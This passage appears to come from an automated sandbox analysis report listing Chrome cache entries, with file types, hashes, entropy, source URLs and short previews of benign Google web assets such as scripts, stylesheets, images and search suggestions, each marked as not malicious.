Encrypted:	false
SSDEEP:	96:uM8NBT5ZKWVMj4kEc0d8xi8u28bXpEfPHMiNzmyVuBhOtpi6V50qPxzmYU:eNBSWVMrBMmyJXpEJ7VuBhOtpV5Bx6z
MD5:	99965BE4CA6A3DC24ABC6D10F54FDCED
SHA1:	730D8B24ED345C4DF0CA06621BFD8A35E61F7288
SHA-256:	11323913455A056A59509DBAB6B2FEF2688B2F930266EF2AF04A4781FE94B443
SHA-512:	2BE3B4A4FB0AFE4E814290834F263BFB285647F2D19427A01AB13696B4B297A7BA0B4D1D08CCC6B2A795353AEC06E24A91DF2B222FE93278173CE1C0EC3C6AB2
Malicious:	false
Reputation:	low
Preview:	)]}'.[[["denver broncos running backs",0,[3,357,362,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["agatha all along episode 3",0,[3,357,362,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["viral pizza dominos coupon",0,[3,357,362,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["gettysburg college student",46,[3,357,362,396,143],{"lm":[],"zf":33,"zh":"gettysburg college student","zi":"Gettysburg College \u2014 Liberal arts college in Gettysburg, Pennsylvania","zl":8,"zp":{"gs_ssp":"eJzj4tTP1TcwykgrMTZg9JJKTy0pqSxOKi1KV0jOz8lJTU9VKC4pTUnNKwEA_UkNvQ"},"zs":"data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBwgHBgkIBwgKCgkLDRYPDQwMDRsUFRAWIB0iIiAdHx8kKDQsJCYxJx8fLT0tMTU3Ojo6Iys/RD84QzQ5OjcBCgoKDQwNGg8PGjclHyU3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3N//AABEIAFAAUAMBIgACEQEDEQH/xAAaAAADAQEBAQAAAAAAAAAAAAAEBQYDAQAC/8QANRAAAgECBQMDAwIFAwUAAAAAAQIDBBEABRIhMRNBURQiYQaBkTJxFSNCobEHM8EkNKLw8f/EABkBAAIDAQAAAAAAAAAAAAAAAAIEAAEDBf/EACERAAICAgICAwEAAAAAAAAAAAECABEDIRIxE

Chrome Cache Entry: 203

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2241 x 960, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	27209
Entropy (8bit):	7.83179196290153
Encrypted:	false
SSDEEP:	768:pC4d4J9JcvQASCoFZwcgLAmnoIKJrBFVEODT5KLnDL:pbd4/JcyFicpKT+J4LDL
MD5:	9E1D9AAFFA7D0E5236C26DEA99751C5D
SHA1:	EC0B07AA85C8B5A198057F4A0420E8513BE8E38B
SHA-256:	4414DD30381CF46B62026E44416AB17BFBB732141089AB21079DB94631A50CB6
SHA-512:	EE3B0E75941C5ACBB09F2F726BA7320010912CCBCED28703AE083FE7CECD3487DF2A1AE6FB0D545425285A40282C21EE165504AE713F807E9D84E20703246674
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.....................PLTEGpL.%..&..&..&..&..&..&..&..&..&..&..&..f..`..`..`..`..`..`..a..b..`..a.O*.7..9..9..9..U-.Q,.Q/..&..&..&..&..a..`..`..`..c.9..:..:..:..:..9..+........"..3..:..:..K+.sT1.m7..F..J.z=.Z)]C.>"..Z..y..........m:.......\|..x..w..z..Q,.S....u..f[<.Q5..W..Q.i3.^oH .6'.U>.a.i.........v.wX.I5.lO......p.{7..A.i.s...r-.R...........i#.....}.o(..$...D..;.<.v-xN!...o.W.H.c(.s7._...g.k0.w......O.z@...a,..P..J..Fm>..v....<..@..D_O/..8..G...`a7...B..(........?....a.....Q .........w0...^.....}......<..h........g ......n....~_A..d.m-..^e:..y9oF..2.f..l..q...C..uY2.W0...nX2.X1.X2.Y2..O.Y2.X1.Y1..Z(Y1....w=.m5..{.>..d.\.......u......_.b.J.?.<...P.h...a-...=.u9...<0..~B.S..f..r.m4.O..B.V.u6.f1.V(.P&^.......tRNS..@..p0..` P..o.....O/.?.Uh.._>....._...y.................................M.........................................................................................................

Chrome Cache Entry: 204

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2134)
Category:	dropped
Size (bytes):	13188
Entropy (8bit):	5.4223896155104025
Encrypted:	false
SSDEEP:	384:i11kqRm4UjryX2DfatZrT80NCGz5r2zItrX:iEqRm4cy338m7d
MD5:	7C96A5F11D9741541D5E3C42FF6380D7
SHA1:	D3FA2564C021CF730E58FFDDB138CF6B57ED126E
SHA-256:	81016AC6BE850B72DF5D4FAA0C3CEC8E2C1B0BA0045712144A6766ADFAD40BEE
SHA-512:	23C162A2E268951729B580E5035AD6CA9969CFCC5CE58A220817B912E76B38BE6C29C3CA7680CB4E8198863D95A72EA65BD06FF7189B5C8475E4C1CE501AEAB1
Malicious:	false
Reputation:	low
Preview:	/. Copyright 2016 Small Batch, Inc.. . Licensed under the Apache License, Version 2.0 (the "License"); you may not. * use this file except in compliance with the License. You may obtain a copy of. * the License at. . http://www.apache.org/licenses/LICENSE-2.0. . Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT. * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the. * License for the specific language governing permissions and limitations under. * the License.. /./ Web Font Loader v1.6.26 - (c) Adobe Systems, Google. License: Apache 2.0 */(function(){function aa(a,b,c){return a.call.apply(a.bind,arguments)}function ba(a,b,c){if(!a)throw Error();if(2<arguments.length){var d=Array.prototype.slice.call(arguments,2);return function(){var c=Array.prototype.slice.call(arguments);Array.prototype.unshift.apply(c,d);return a.apply(b,c)}}return function(){return a.app

Chrome Cache Entry: 205

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4232), with no line terminators
Category:	downloaded
Size (bytes):	4232
Entropy (8bit):	5.531069792601157
Encrypted:	false
SSDEEP:	48:l2IEhgIOafN8fNDzFMqwWgNUIu9ThNpIdgNlLIjeRSbcDNdm7xKAo7:ADHd4tzFlwLNU9xhLIdtjKudi
MD5:	DA43A25BD1F9DD99ABEEE97AE6E6BCA6
SHA1:	FAF739B5A3ACE85BABEF8AF8C123C7B140D5222A
SHA-256:	FC42CAFE3E110C38CB62AB04E51E2F806F308D3ED3F95C9E3AB5D0B7B3C9978A
SHA-512:	CB7ABBCBFF96B0B6C7AA9A674C8DB81FD6D3AD3D1F950B08F6F64AE3BC86E0ECD3DDF05C6542CAD98CE5ED59BBF2C1B510B2598064DE0B42DEB051F1CF368DFD
Malicious:	false
Reputation:	low
URL:	"https://www.google.com/xjs/_/ss/k=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC/d=1/ed=1/br=1/rs=ACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl"
Preview:	:root{--COEmY:#1f1f1f;--xhUGwc:#fff}:root{--vZe0jb:#a8c7fa;--nwXobb:#638ed4;--VuZXBd:#001d35;--uLz37c:#545d7e;--jINu6c:#001d35;--TyVYld:#0b57d0;--ZEpPmd:#c3d9fb;--QWaaaf:#638ed4;--DEeStf:#f5f8ff;--TSWZIb:#e5edff;--BRLwE:#d3e3fd;--gS5jXb:#dadce0;--Aqn7xd:#d2d2d2;--EpFNW:#fff;--IXoxUe:#5e5e5e;--bbQxAb:#474747;--YLNNHc:#1f1f1f;--TMYS9:#0b57d0;--JKqx2:#1a0dab;--rrJJUc:#0b57d0;--mXZkqc:#d2d2d2;--Nsm0ce:#0b57d0;--XKMDxc:#f3f5f6;--aYn2S:#f3f5f6;--Lm570b:#dee1e3}.zJUuqf{margin-bottom:4px}.AB4Wff{margin-left:16px}.OhScic{margin:0px}.v0rrvd{padding-bottom:16px}.zsYMMe{padding:0px}.wHYlTd{font-family:Roboto,Arial,sans-serif;font-size:14px;line-height:22px}.yUTMj{font-family:Roboto,Arial,sans-serif;font-weight:400}.VDgVie{text-align:center}.TUOsUe{text-align:left}@keyframes g-snackbar-show{from{pointer-events:none;transform:translateY(0)}to{transform:translateY(-100%)}}@keyframes g-snackbar-hide{from{transform:translateY(-100%)}to{transform:translateY(0)}}@keyframes g-snackbar-show-content{from{op

Chrome Cache Entry: 206

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	2091
Entropy (8bit):	7.8938748179764
Encrypted:	false
SSDEEP:	48:aGmurFSJs329qIqvZO7N4+lRSm+3gdfI8hV92jPH9b45MloqbSHTrpG:4QUvKI7943UJhn2jP3pUG
MD5:	6282A05D151E7D0446C655D1892475E2
SHA1:	B2B05F319DA0E73250200AE9BB518A318D6B4C5D
SHA-256:	4CAB9CF78FD7C85AE2236CDD47B905FA4173F664946DFAB008591B3CFE4280B7
SHA-512:	DF0C4C01555430BD2AFAD409E40A422F5EFB0ED9B6E86168874B46312FFC0BA7CA2B5503E49858035056C342A83CBC42721AA89077BD2E1F698692AF4277BAB5
Malicious:	false
Reputation:	low
URL:	https://www.google.com/images/hpp/ic_wahlberg_product_core_48.png8.png
Preview:	.PNG........IHDR...0...0.....W.......IDATx........m.tm.86.m.m...m.Xo..._~..Mm.&..x....v.....?... .~^.TV....z.wK.....-.`..w.............4....."...z6Z."....`;@....!...S.Q..E...L$..`01..S(.v...vn._...H.......H.fs.8).....q....\....9B>...)>#2...A....z..8.#+A.V-..hh....3.......c.......F. 3.......~.^Q......c.....a.1...gZ....y....wU..2...].-.0b].......[......w...&K..$..K..\.t..QoY..O?....u.Sa.-...na.Z..}..._s..~[.Ue.M.!#Y.....%.t.7y....J......Q.0fC.Fo..@..&...B.....&..}.ld....O.#+...<.z..,."?vC....Y.....<d..."b.D.(sX..c..5.z,..!...oV.. .....>O.#..pHG..y.j.7.-@.K.s..,...&.%6.. O=dj....S..;.O..ylc.O.~....Tn.F.\|.Y..X..@........e..O.Z......}(H...vp.... ...y..&..:.......8y...{n..R^...:.q.......>....C.....^P..C..%..<. 6...9..,.$0x.M.=.`\..MI..\|.........^...W-"...@..J........K.m...h...x.H.>.c.>.w!......:X.b%.v....)..[R..-..>.+!..?...?.....Q.G:F...k..A.)`*.^N$...{9.<.PD...7`).3.d........h.k..{]&.;^.h.s>BREP.X.O.~P\|[....R].m,.......Z..Pk.g0.yl...Z.qp..

Chrome Cache Entry: 207

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1885)
Category:	dropped
Size (bytes):	126135
Entropy (8bit):	5.498654960721984
Encrypted:	false
SSDEEP:	3072:AkyvF6US20FCdrgVr3dfPeIofdhIUsTx0wVnX9Mb:AkygUS29rWPeIofdCVnX9Mb
MD5:	C299A572DF117831926BC3A0A25BA255
SHA1:	673F2AC4C7A41AB95FB14E2687666E81BC731E95
SHA-256:	F847294692483E4B7666C0F98CBE2BD03B86AE27B721CAE332FEB26223DDE9FC
SHA-512:	B418A87A350DBC0DEF9FAF3BE4B910CB21AE6FFFC6749EECEA486E3EB603F5AF92F70B936C3D440009482EDE572EE9736422CF89DCDD2B758DFA829216049179
Malicious:	false
Reputation:	low
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);.var ba,fa,ha,na,oa,sa,ua,wa;ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};fa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.ma=ha(this);na=function(a,b){if(b)a:{var c=_.ma;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&fa(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r

Chrome Cache Entry: 208

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3521)
Category:	dropped
Size (bytes):	21590
Entropy (8bit):	5.396142031067612
Encrypted:	false
SSDEEP:	384:/h0cEX6ZB6/NfqrgR0Jlm0OU/asm0M9WkugJ6pmzF0mJJRdGbFJgBeAD+cvl2B:/chNfGgR0Jlm0OU/asm0M9Wkug26DRsj
MD5:	80D62A6AA980F11422556FE8065B4CAB
SHA1:	CD272FA4DAD7328B3884393E59458B4C03D4CC25
SHA-256:	E70AA93344F17D038C8854DE1243A54A7A0AA478143E1AFBFF48DF14F0DE4343
SHA-512:	3A73C667C7224CDFBE67B5AFC12E7C5305B49396C7E3BE3541DE1DE58C17296C86B5FD42805BB96EFA7F565B0BC9347EDF1EA51DE0B7B62FC233C5858ABB8A84
Malicious:	false
Reputation:	low
Preview:	"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi\|\|{};(function(_){var window=this;.try{._.q("RqjULd");.var Zha=function(){var a,b,c,d;return(d=sG)!=null?d:sG=Object.freeze({Zb:function(e){return _.rf(_.He("iCzhFc"),!1)\|\|e===-1},Jg:(a=_.Ul(_.He("y2FhP")))!=null?a:void 0,uN:(b=_.Ul(_.He("MUE6Ne")))!=null?b:void 0,eg:(c=_.Ul(_.He("cfb2h")))!=null?c:void 0,Ze:_.nA(_.He("yFnxrf"),-1),DC:_.oA(_.He("fPDxwd")).map(function(e){return _.nA(e,0)}).filter(function(e){return e>0})})},$ha=function(a){if(_.n&&_.n.performance&&_.n.performance.memory){var b=_.n.performance.memory;if(b){var c=new tG;isNaN(b.jsHeapSizeLimit)\|\|._.xf(c,1,_.kd(Math.round(b.jsHeapSizeLimit).toString()));isNaN(b.totalJSHeapSize)\|\|_.xf(c,2,_.kd(Math.round(b.totalJSHeapSize).toString()));isNaN(b.usedJSHeapSize)\|\|_.xf(c,3,_.kd(Math.round(b.usedJSHeapSize).toString()));_.il(a,tG,1,c)}}},aia=function(a){if(uG()){var b=performance.getEntriesByType("navigation");if(b&&b.length){var c=new vG;if(b=b[0]){switc

Chrome Cache Entry: 209

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1518)
Category:	dropped
Size (bytes):	269484
Entropy (8bit):	5.481173643062106
Encrypted:	false
SSDEEP:	3072:t5R+/rLk07byKtxMaQTdpJfb3N5PZ3BiS3Zw5oluv3sfaBOCtwHr1DFCx6:R+/XkkGKtQTdp1N/Bl34OuPQCOC+VFCM
MD5:	0B51953A796E17B4D9C4223E9D5AFBD6
SHA1:	014B3894888F2288222C1AC4698123CF32649FBC
SHA-256:	FA80771F7624B00C94526022A986CA657521400C5A9E7A32A09D2628F7DF2FCA
SHA-512:	AEA4CC24AD434A4D5F6917B604D23BCF10E258A062A73C6D07CA1204A548DCA5F6F666AF3B2AFE08CC2682AF35E2B581F15F868E429F32F924242F92979E7427
Malicious:	false
Reputation:	low
Preview:	"use strict";_F_installCss(".KL4X6e{background:#eee;bottom:0;left:0;opacity:0;position:absolute;right:0;top:0}.TuA45b{opacity:.8}sentinel{}");.this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi\|\|{};(function(_){var window=this;.try{._.Tz=function(a,b,c,d,e,f,g){var h=(0,_.Md)(a.ta);_.Dc(h);a=_.ne(a,h,c,b,2,f,!0);c=d!=null?d:new c;if(g&&(typeof e!=="number"\|\|e<0\|\|e>a.length))throw Error();e!=void 0?a.splice(e,g,c):a.push(c);(0,_.Bc)(c.ta)&2?(0,_.Yk)(a,8):(0,_.Yk)(a,16)};_.Vz=function(a){if(a instanceof _.Uz)return a.j;throw Error("w");};_.Wz=function(a){return new _.Uz(_.La,a[0].toLowerCase())};._.Xz=function(a,b,c,d){if(a.length===0)throw Error("w");a=a.map(function(f){return _.Vz(f)});var e=c.toLowerCase();if(a.every(function(f){return e.indexOf(f)!==0}))throw Error("ga`"+c);b.setAttribute(c,d)};_.bt.prototype.kc=_.ca(28,function(){return this.rb.length==0?null:new _.M(this.rb[0])});_.M.prototype.kc=_.ca(27,function(){return this});_.bt.prototype.Ia=_.ca(26,function(){retur

Chrome Cache Entry: 210

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2682)
Category:	downloaded
Size (bytes):	2687
Entropy (8bit):	4.7274528051086975
Encrypted:	false
SSDEEP:	48:SB0EIHG1gLmc4Gch9bC9cAbc24mwHpX0zomW4CeIaudZ21zr9bIOfdKzi6g:S3Im1vcdcOi24mwJEzoZ4fIaudwIu6g
MD5:	971569E9B407C47F64BEE9A2AFDF61D2
SHA1:	E91085740886FD1DAFD56416DEF3D1337C2C5E44
SHA-256:	32BE732439F4880E9F4911F6086956661B16D1CDC599D462CDEC1FF7442ED157
SHA-512:	27FD73DFFCA97DAF2062305AA38042646B04238CFAC9D6A4FF1785D4E1B207502C22BB2347FBDBC5A81ED19364ED509ADBF958A841A46BD37C7E5742325FECBF
Malicious:	false
Reputation:	low
URL:	https://www.google.com/logos/2024/popcorn/rc4/messages.en.nocache.json
Preview:	)]}'.{"back":"Back","button_catch":"Catch","button_heal":"Heal","button_main_menu":"Main menu","button_replay":"Play again","button_shield":"Shield","button_throw":"Throw","character_ready":"Ready!","character_select_catch":"Catch & throw","character_select_heal":"Heal","character_select_shield":"Shield","character_select_title":"Select player","countdown_go":"GO!","countdown_ready":"Ready","countdown_set":"Set","email":"Email","emote_close":"Close emote menu","emote_corn":"Corn emote","emote_explosion":"Explosion emote","emote_fire":"Fire emote","emote_open":"Open emote menu","emote_popcorn":"Popcorn emote","error":"Something went wrong","facebook":"Facebook","finding_players":"Finding players","game_over":"GAME!","game_over_congrats":"Congrats!","game_over_last_kernel":"You're the last player standing","game_over_last_squad":"You're the last squad standing","how_to_play":"How to play","level_complete":"Level complete!","loading":"Loading","loading_span":"Compete against 59 players to

Chrome Cache Entry: 211

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.875
Encrypted:	false
SSDEEP:	3:Hnhn:Bn
MD5:	BEEDCB4EB0A559E6CE2D1E20D38CB330
SHA1:	A04EE9801770C0E81B170D7992EC3735E878AA58
SHA-256:	6E9D99B87595B07B10676B68EBE9AA8B63DF7D9A74F59CC91EED60EA1FBDC6EF
SHA-512:	BD101CDF7FDF1210127D83CE76E3F6F6F1378259F0A55C112E39C49A9131B8636FB020E07E985B8427A35B62A544F2F7C5F75B11AD69EF2C4AE67A41BD5898B2
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAn11VQ7sgCk8RIFDWlIR0c=?alt=proto
Preview:	CgkKBw1pSEdHGgA=

Chrome Cache Entry: 212

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2682)
Category:	dropped
Size (bytes):	2687
Entropy (8bit):	4.7274528051086975
Encrypted:	false
SSDEEP:	48:SB0EIHG1gLmc4Gch9bC9cAbc24mwHpX0zomW4CeIaudZ21zr9bIOfdKzi6g:S3Im1vcdcOi24mwJEzoZ4fIaudwIu6g
MD5:	971569E9B407C47F64BEE9A2AFDF61D2
SHA1:	E91085740886FD1DAFD56416DEF3D1337C2C5E44
SHA-256:	32BE732439F4880E9F4911F6086956661B16D1CDC599D462CDEC1FF7442ED157
SHA-512:	27FD73DFFCA97DAF2062305AA38042646B04238CFAC9D6A4FF1785D4E1B207502C22BB2347FBDBC5A81ED19364ED509ADBF958A841A46BD37C7E5742325FECBF
Malicious:	false
Reputation:	low
Preview:	)]}'.{"back":"Back","button_catch":"Catch","button_heal":"Heal","button_main_menu":"Main menu","button_replay":"Play again","button_shield":"Shield","button_throw":"Throw","character_ready":"Ready!","character_select_catch":"Catch & throw","character_select_heal":"Heal","character_select_shield":"Shield","character_select_title":"Select player","countdown_go":"GO!","countdown_ready":"Ready","countdown_set":"Set","email":"Email","emote_close":"Close emote menu","emote_corn":"Corn emote","emote_explosion":"Explosion emote","emote_fire":"Fire emote","emote_open":"Open emote menu","emote_popcorn":"Popcorn emote","error":"Something went wrong","facebook":"Facebook","finding_players":"Finding players","game_over":"GAME!","game_over_congrats":"Congrats!","game_over_last_kernel":"You're the last player standing","game_over_last_squad":"You're the last squad standing","how_to_play":"How to play","level_complete":"Level complete!","loading":"Loading","loading_span":"Compete against 59 players to

Chrome Cache Entry: 213

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	101
Entropy (8bit):	5.192000568004349
Encrypted:	false
SSDEEP:	3:VnS++JCe8VJy4JUkDZHG6JElJWdHZ+4LQpNYe:VnP+JCnY4TLJkWdHAHpue
MD5:	9DDB8164861029C113597A6A5D39C2C2
SHA1:	FDE973A9A93D663214DE349ACE1CD4757F6A1035
SHA-256:	071EC42810D1F7349D197F005D6822A3E6E44E162F9047D3202F589F0928B9C1
SHA-512:	B3BE09A274A5AFB1AE07990293E1AE78385D50D597F7271D8BA2636E2A20A986F030104CDA43043B27D4AC208F83DA89479095A3BA87F13CF921348A5CF3BB39
Malicious:	false
Reputation:	low
Preview:	)]}'.21;["8oP1ZrjxL7mfi-gPqby8cA","2085"]c;[2,null,"0"]1b;<div jsname="Nll0ne"></div>c;[9,null,"0"]0;

Chrome Cache Entry: 214

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2134)
Category:	downloaded
Size (bytes):	13188
Entropy (8bit):	5.4223896155104025
Encrypted:	false
SSDEEP:	384:i11kqRm4UjryX2DfatZrT80NCGz5r2zItrX:iEqRm4cy338m7d
MD5:	7C96A5F11D9741541D5E3C42FF6380D7
SHA1:	D3FA2564C021CF730E58FFDDB138CF6B57ED126E
SHA-256:	81016AC6BE850B72DF5D4FAA0C3CEC8E2C1B0BA0045712144A6766ADFAD40BEE
SHA-512:	23C162A2E268951729B580E5035AD6CA9969CFCC5CE58A220817B912E76B38BE6C29C3CA7680CB4E8198863D95A72EA65BD06FF7189B5C8475E4C1CE501AEAB1
Malicious:	false
Reputation:	low
URL:	https://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js
Preview:	/. Copyright 2016 Small Batch, Inc.. . Licensed under the Apache License, Version 2.0 (the "License"); you may not. * use this file except in compliance with the License. You may obtain a copy of. * the License at. . http://www.apache.org/licenses/LICENSE-2.0. . Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT. * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the. * License for the specific language governing permissions and limitations under. * the License.. /./ Web Font Loader v1.6.26 - (c) Adobe Systems, Google. License: Apache 2.0 */(function(){function aa(a,b,c){return a.call.apply(a.bind,arguments)}function ba(a,b,c){if(!a)throw Error();if(2<arguments.length){var d=Array.prototype.slice.call(arguments,2);return function(){var c=Array.prototype.slice.call(arguments);Array.prototype.unshift.apply(c,d);return a.apply(b,c)}}return function(){return a.app

Chrome Cache Entry: 215

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (593)
Category:	downloaded
Size (bytes):	1671
Entropy (8bit):	5.290614524727893
Encrypted:	false
SSDEEP:	48:XrNKndOZYoLmuJiuX4NRJqBGbafGGbZA/G4k:xfbLm944N6fY/G3
MD5:	B6678CF8511C982AAFF6006FB9401CF5
SHA1:	38D1A09A409B96EA0EE5E8FCE75883AF0050DC89
SHA-256:	B247AC02EFF5C347932B6888541FD0F494464E968F3400770DE01DD981214259
SHA-512:	C4634CF368CB10004DBBCBBC4E50DF463928FF39050112F27A5086904467BE0A20E5292EF82ACB488531968D4B3F6F8D8F5C367ADDC1DAD2802F632CA962A13A
Malicious:	false
Reputation:	low
URL:	"https://www.google.com/xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=lOO0Vd,sy8s,P6sQOc?xjs=s4"
Preview:	this._hd=this._hd\|\|{};(function(_){var window=this;.try{._.w("lOO0Vd");._.Yab=new _.Nd(_.mLa);._.y();.}catch(e){_._DumpException(e)}.try{.var ibb;_.jbb=function(a,b,c,d,e){this.NEa=a;this.Pld=b;this.plb=c;this.Ord=d;this.rEd=e;this.jcb=0;this.olb=ibb(this)};ibb=function(a){return Math.random()Math.min(a.PldMath.pow(a.plb,a.jcb),a.Ord)};_.jbb.prototype.Z2b=function(){return this.jcb};_.jbb.prototype.Tja=function(a){return this.jcb>=this.NEa?!1:a!=null?!!this.rEd[a]:!0};_.kbb=function(a){if(!a.Tja())throw Error("ye`"+a.NEa);++a.jcb;a.olb=ibb(a)};.}catch(e){_._DumpException(e)}.try{._.w("P6sQOc");.var lbb=function(a){var b={};_.Fa(a.qsb(),function(e){b[e]=!0});var c=a.mrb(),d=a.Arb();return new _.jbb(a.zrb(),c.ka()1E3,a.mib(),d.ka()1E3,b)},mbb=!!(_.Kg[29]>>29&1);var nbb=function(a){_.Bn.call(this,a.Ma);this.logger=null;this.ka=a.service.gDb;this.ta=a.service.metadata;a=a.service.Abd;this.fetch=a.fetch.bind(a)};_.C(nbb,_.Bn);nbb.Ga=function(){return{service:{gDb:_.dbb,metadata:_.Yab,Ab

Chrome Cache Entry: 216

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image
Category:	downloaded
Size (bytes):	660
Entropy (8bit):	7.7436458678149815
Encrypted:	false
SSDEEP:	12:CPgCZ+X6xCDzNAs1dVc1rhVbo50xCmGjkm9vgZAO2YCGoOg/t+YcJNw:KZ+iC134tFoOxC3/vO2YCpR8YcJNw
MD5:	C3DFF0D9F30EC0BCF4DEC9524505916B
SHA1:	4B378403ACBEBC3747E08C69B5FD7770A850C9EB
SHA-256:	73D788F86BE22112BB53762545989C0F1BBDB7343161130952C9BA3834FF81E3
SHA-512:	677EA304D00D176ACF61FF68BF23BD5F77AD2928D7DE9F4B842292BC9D3FB7029FE9F578B62F142DCE689230F392E828098EED3484FE2DBEE6E1A7AA5378E2C6
Malicious:	false
Reputation:	low
URL:	https://www.google.com/images/searchbox/desktop_searchbox_sprites318_hr.webp
Preview:	RIFF....WEBPVP8L..../'....Hv.=n.......Q...a..(Rv.o..U.....l..m........0l.6l..f.......A?B.C.A...2h..Ag0....G8.n#)R.j.x..P.F..I;.Ox......7-...bX./..]...3..T....5...x...G.C....%.u.....u/._.=....<!q.\...9.....\....p:..P.4.aS.N).>.>.."..9..Vh ....no....l.1..#6p\c..2..>..=8...........FP.^....+/.~......hs..D.Jm..9...r....t*.H..~T^\|.....l..l......he..}f....d.."....K...&1..................pl.Pf.%6...2X..I...eXQ(.K..1%c..w.s._..._K`K.1}..D.E=...<..ytM..>.q'.e.L.~$...b..;k.M.....t\O..m.I._..F....'........z.]..u?~..P.zJM.. k...p~9..D....".Zl$?f..+...\.Pg..%...;.[R>N.#.W.e..@q...(....]&......K.......?.\|.z..(...:&m.V.C.'...D^.R....

Chrome Cache Entry: 217

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1885)
Category:	downloaded
Size (bytes):	126135
Entropy (8bit):	5.498654960721984
Encrypted:	false
SSDEEP:	3072:AkyvF6US20FCdrgVr3dfPeIofdhIUsTx0wVnX9Mb:AkygUS29rWPeIofdCVnX9Mb
MD5:	C299A572DF117831926BC3A0A25BA255
SHA1:	673F2AC4C7A41AB95FB14E2687666E81BC731E95
SHA-256:	F847294692483E4B7666C0F98CBE2BD03B86AE27B721CAE332FEB26223DDE9FC
SHA-512:	B418A87A350DBC0DEF9FAF3BE4B910CB21AE6FFFC6749EECEA486E3EB603F5AF92F70B936C3D440009482EDE572EE9736422CF89DCDD2B758DFA829216049179
Malicious:	false
Reputation:	low
